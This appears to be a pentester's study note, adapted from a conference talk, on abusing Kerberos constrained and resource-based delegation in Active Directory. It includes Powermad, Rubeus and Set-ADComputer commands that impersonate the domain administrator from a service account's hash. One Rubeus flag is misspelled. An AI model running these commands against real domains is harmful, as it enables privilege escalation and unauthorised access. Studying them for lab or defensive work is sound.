Constrained

All information found below has been adapted from Attl4s video-presentation and its corresponding slide deck.

Theory

Constrained delegation does not leverage TGTs, and thus, cannot impersonate a user freely on any service (msds-allowedtodelegateto). Instead, it uses the S4U2Self and S4U2Proxy Keberos extensions:

1. S4U2Proxy: allows a service to obtain a ST on behalf of a client to another service. The initial client ST is required as evidence that the client has authenticated.

2. S4U2Self: allows a service to obtain a ST to itself as evidence that a client has authenticated. Any services (SPN account) can invoke S4U2Self.

Without Protocol Transition (Kerberos Only)

Figure 1: CD with PT process (image taken from here).

Exploitation

This process requires only a ST (evidence/additional) as a requirement to invoke it.

We need an account with at least one SPN (Figure 2.1).

RBCD ?
# create a machine account (powermad)
New-MachineAccount -MachineAccount attl4s

We can impersonate web01 through its credentials (Figure 2.2).

# generate a TGT for web01
.\Rubeus.exe asktgt /user:web01$ /rc4:<hash> /domain:capsule.corp /nowrap /ptt

Figure 2: Creating a SPN account and impersonating web01 (image taken from here).

Any SPN account can configure RBCD for itself. So we will make web01 to trust attl4s, so the latter can impersonate any user to the former (Figure 3).

Import-Module .\Microsoft.ActiveDirectory.Management.dll
# set the RBCD bit
Set-ADComputer -Identity web01$ -PrincipalsAllowedToDelegateToAccount attl4s$ -Verbose

Figure 3: Setting the RBCD bit (image taken from here).

Now, we can use attl4s machine to obtain a ST for web01, impersonating the administrator (S4U2Self & S4U2Proxy) (Figure 4).

.\Rubeus.exe s4u /impesonateuser:administrator /user:attl4s /rc4:<hash> /msdsspn:cifs/web01.capsule.corp /nowrap

Figure 4: Going through the S4U process (image taken from here).

Since the second ST ticket is forwardable, it can be used on Kerberos for authenticating as administrator (TGT).

With Protocol Transition

• PT means "I don't care how the client authenticates". It just needs the client's name.

• The difference vs. Without Protocol Transition (Kerberos Only) is that the S4U2Proxy cannot be invoked as we don't have a ST for the user (since NTLM authentication was used) (Figure 5.1).
• The difference with RBCD is that the KDC checks the TRUST_TO_AUTH_FOR_DELEGATION setting and sees that web01 is trusted, so it issues a forwardable ST to it (Figure 5.2), therefore, the S4U2Proxy can now be invoked.

Figure 5: Constrained Delegation with protocol transition process (image taken from here).

Exploitation

.\Rubeus.exe s4u /impersonateuser:administrator /user:web01$ /rc4:<hash> /msdsspn:cifs/sql01.capsule.corp /altservice:http/sql01.capsule.corp /nowrap

If we compromise a service configured for CD with PT (web01), then we can generate a ST for any user we want (administrator) with S4U2Self pointing to web01 (Figure 6).

Figure 6: Getting a forwardable ST as administrator with the S4U2Self for web01 (image taken from here).

The ST generated from S4U2Self will be forwardable, and thus can be used with S4U2Proxy to generate a second ST for the targeted service (cifs) as the impersonated user (administrator) (Figure 7).

Figure 7: Generating the second ST with S4U2Proxy for the targeted service as administrator (image taken from here).

Althought, the SPN account will have specific service(s) in the msDS-AllowedToDelegateTo attribute (cifs) (Figure 8), this can modified to target other services from the same service account (http) (Figure 6 & 7).

Figure 8: The msds-allowedtodelegateto attribute of WEB01 (image taken from here).

Resources

Video Lecture

BlackHat Talk